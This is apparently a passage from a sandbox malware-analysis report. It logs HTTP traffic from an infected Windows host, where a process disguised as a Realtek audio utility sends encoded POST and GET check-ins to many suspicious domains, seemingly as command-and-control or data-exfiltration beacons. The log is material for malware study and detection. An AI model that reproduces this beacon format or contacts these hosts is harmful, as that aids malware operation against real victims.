                                                                            Data Ascii: /Nt0u4NNU/gA/oUxd+l2PJLyEnyRSs7jPksfxjTOjf8Uey/w3cX6j56u1dPDhTJA3FjHyWhjgAlagDLbj2Ds96+AMpcBC+0NuhlFWppVVbPdN98YP2xyLxR6Suy2jdzE6uUiuLbg/701+uPIwntrzS7w7n9zr1ktsxMzwoJAXEiobJU6DuLOVHsx2yZIjNLEkZMum8uk3YXTmehsStc5sn64B/DkiDt8EPD/mH/NMG2MWz4USbW
                                                                            Dec 3, 2024 18:57:56.060959101 CET | 1494 | OUT
                                                                            Data Ascii: Nqlg6xaZS7Ed2mfaX7aMTvEI4MPH2/kRbRRgP56E9284gMesnt2JDPpkzr0T1dXIiCiQs64FwM3S7D+FC1w2oxaI6SP/6XiElq+1s9hTBfqaaLD2AGjKZBZNYSYnTF8BHjxgq8RGduYi0s/werovHyvWOUK80Y3cidWJEKF9IHzdFRc2K+C+56ZO4Lr/IhyLwEUmPdlCC9waPr6DlGhUWckVhGA0raRkdKVt1wAT5++AUAvS0q8
                                                                            Dec 3, 2024 18:57:56.613667965 CET | 1102 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:56 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2F6r0VbfSlBrKDvHw5UcOQmwubrjr7On0EU96h1azsBE00BDqBsuvFJm7MgOxaDvQArDDlBqRA4NAWCIvWUWW%2BmOF%2BzBdvc%2BywGYmPgTKm11Mej%2Fam4pV9gQVEG4%2FDAEhcNDEXa3A9U%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec57121ce4cd9b9-MIA
                                                                            Content-Encoding: gzip
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126193&min_rtt=126193&rtt_var=63096&sent=3&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7939&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Dec 3, 2024 18:57:56.613677979 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            48 | 192.168.11.20 | 49797 | 104.21.57.248 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:57:58.715545893 CET | 491 | OUT | GET /8gp4/?ChhG6=J-xs&2O=FEeZWlhMd48ysDs1jEeP275omfikUvcs8a8x1+EEc0Vq+hoQB7y77Hco5oow9pdvGKqyyoz5OAo+pUm014OHBVCBJUJYyAljBpTR8DkbNSdXd83JJSpVoa4= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.rgenerousrs.store
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:57:59.220752001 CET | 1108 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:57:59 GMT
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sVGni9JOIlMPUuWw8s7Klc3Bya8rScV1pDh3A0O089tzEpZKxTnidLz0QgTp9G3yOAo5WpbJkzP6ws0fPkEqIuf55l7NArQ2su3VHV5Y7TXBwCcPYF%2F8ZZeRaJGazlVxIydtsU6FlM%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ec571325a157497-MIA
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=126725&min_rtt=126725&rtt_var=63362&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=491&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Ascii: 118<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>
                                                                            Dec 3, 2024 18:57:59.220797062 CET | 11 | IN | Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: 10


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            49 | 192.168.11.20 | 49798 | 74.48.143.82 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:58:04.785938978 CET | 755 | OUT | POST /cpit/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            Origin: http://www.bpgroup.site
                                                                            Referer: http://www.bpgroup.site/cpit/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=hoDiBsmuly//kaENQjndaeUmoecBfqdtwGrtYhp5y3EZxHwdJRSb0kPawNr8eeGHgUI91JXo3kZn2H56lBiu8N2HvJdL7jxPUf154gFCW+pWC708n3qXQcaE9IIs/eKiTxPaI3/Btmv0eJO6jZ4XX43bL2lZWw9hEItACHZ7YPt6dCNLDloA6vdbFAcjAxun0A==
                                                                            Dec 3, 2024 18:58:04.994240999 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:05 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:04.994303942 CET | 200 | IN
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            50 | 192.168.11.20 | 49799 | 74.48.143.82 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:58:07.500086069 CET | 775 | OUT | POST /cpit/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            Origin: http://www.bpgroup.site
                                                                            Referer: http://www.bpgroup.site/cpit/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=hoDiBsmuly//n6UNXEzdc+Uln+cBWKdpwGntYkNTyhsZxiMdTQSb3kPa4tr9DOHFgUUP1Lzo3kNn2GJ6l2Wx8d2FxpdF1DxPUf154klkW+BWCqk8nWqIOsaFwYIs1+K+TxP0I2j/tlX0eMy6jMUWY43dFWkRehguB8lCRkhiQftEV0AReXck58BpBwlLCzv8pM/A1r3cAd9r4E4UwldfaMc=
                                                                            Dec 3, 2024 18:58:07.690882921 CET | 1289 | IN | HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:07 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:07.691257954 CET  200                IN
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            51          192.168.11.20  49800        74.48.143.82    80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:58:10.212886095 CET  2578               OUT        POST /cpit/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            Origin: http://www.bpgroup.site
                                                                            Referer: http://www.bpgroup.site/cpit/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:58:10.213011026 CET  5346               OUT
                                                                            Data Ascii: uQS+TSxp4sVcfsYiOTQZ0BgFssdJwuzieleX/6U4cp2wLh+KTgZyiAW+gGCdvkaP7OLRIfDfNOmWFJTr4j4aFvxDA1B5CA2oQaS5PATBtuNqXouaVtjCggK6kU51MilULs8QLf3MPnAQXuNalK9JNZ+SukfceCVFEn7sAxPeIeSKg3WJYyO+0PXCeA2ZYaBvBBfMPUXqpQKz0cAKhBki0bMhlkjwqXmoQHvYKFnGP+dkamJyZ+9
                                                                            Dec 3, 2024 18:58:10.401246071 CET  1289               IN         HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:10 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:10.401295900 CET  200                IN
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
                                                                            52          192.168.11.20  49801        74.48.143.82    80                7608  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:58:12.930947065 CET  486                OUT        GET /cpit/?2O=sqrCCcTnmzrg1P4sAk/QU75pr5UiXpEX3HrYYQRUrHENwAM+UA+gtHvn9s/6e57/pGZInJKN/XxZ2ntAsziA3/X4179OogJSAfxe5UAmetVNY4oSlmiuZpQ=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.bpgroup.site
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:58:13.119966984 CET  1289               IN         HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:13 GMT
                                                                            server: LiteSpeed
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:13.119992018 CET  200                IN
                                                                            Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            53          192.168.11.20  49806        202.92.5.23     80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:58:44.448559046 CET  488                OUT        GET /fev0/?ChhG6=J-xs&2O=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.thaor56.online
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:58:44.822220087 CET  1289               IN         HTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Tue, 03 Dec 2024 17:58:44 GMT
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                            Dec 3, 2024 18:58:44.822318077 CET  181                IN
                                                                            Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            54          192.168.11.20  49807        13.248.169.48   80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:58:49.983441114 CET  767                OUT        POST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMo1MlJequvVvLUXXfxGfKgroEKyNwxdeJOA==


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            55          192.168.11.20  49808        13.248.169.48   80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:58:52.669116974 CET  787                OUT        POST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj402OC0YzffSTGIUVBsWL3aqckRLQLYTOf0=


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            56          192.168.11.20  49809        13.248.169.48   80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:58:55.358460903 CET  2578               OUT        POST /98j3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            Origin: http://www.optimismbank.xyz
                                                                            Referer: http://www.optimismbank.xyz/98j3/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:58:55.358531952 CET  5358               OUT
                                                                            Data Ascii: Go6WScpi1udu7n9/HEd0pXDuqzWf5TPx5qfRx6yQ2YNysV2f0MEyZXD4SlCGrjOqA8peLRc68EmajQGXITwyFrCJxQGLDeZUgXEHQ/wgvb+c/xje99+IsrsNuju/CJobZGoJ7d7JDDnKl/1NoL8GTsvqKy3jgN1vIUI04OUaoe0rx7MNrRD2YDcE/lE3OL2FEFaY42kjetwTeoOjw7QscHXiuLv3HuiIlkLcHm0HmlGrcSKcY92


                                                                            Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                                            57          192.168.11.20  49810        13.248.169.48   80
                                                                            Timestamp                           Bytes transferred  Direction  Data
                                                                            Dec 3, 2024 18:58:58.047234058 CET  490                OUT        GET /98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Dec 3, 2024 18:58:58.206229925 CET | 389 | IN | HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 03 Dec 2024 17:58:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 249
                                                                            Connection: close
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
58 | 192.168.11.20 | 49811 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:59:03.405235052 CET | 761 | OUT | POST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
Dec 3, 2024 18:59:03.599597931 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:03 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.11.20 | 49812 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:59:06.122956038 CET | 781 | OUT | POST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
Dec 3, 2024 18:59:06.316783905 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:59:06 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.11.20 | 49813 | 209.74.77.109 | 80
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:59:08.841231108 CET | 2578 | OUT | POST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Data Ascii: 2O=[TRUNCATED]
